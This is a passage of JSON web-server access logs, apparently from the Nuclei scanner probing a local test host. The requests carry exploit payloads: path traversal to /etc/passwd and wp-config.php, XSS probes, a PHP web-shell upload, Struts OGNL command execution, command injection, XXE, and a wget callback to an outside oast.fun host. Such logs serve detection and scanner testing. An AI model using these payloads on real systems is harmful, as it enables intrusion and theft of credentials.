"13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F297MTrY3L4VqsG8lnuy2qrFUq3S.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"payload=<%3fxml+version%3d\x221.0\x22+%3f>%25xxe%3b]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTrY3L4VqsG8lnuy2qrFUq3S.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://c9v8h88smpv8c1ig07h0hfwutzrpg1tg5.oast.fun%22)%7D' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22csrf_token\x22\x0D\x0A\x0D\x0A{{csrf}}\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MTxMdMmiXICvkfzoptfklsZh.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x0D\x0A \x22type\x22: \x22297MTxMdMmiXICvkfzoptfklsZh\x22\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /variable/varimport HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/admin/variable/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?g=g&m=Door&a=index&content=console.log(\x22Nuclei - Open-source project [github.com/projectdiscovery/nuclei]\x22)&sgcwebtools=&button=Save+Changes&action=savegooglecode","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=smartcode HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::1]' UNION SELECT '/","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", 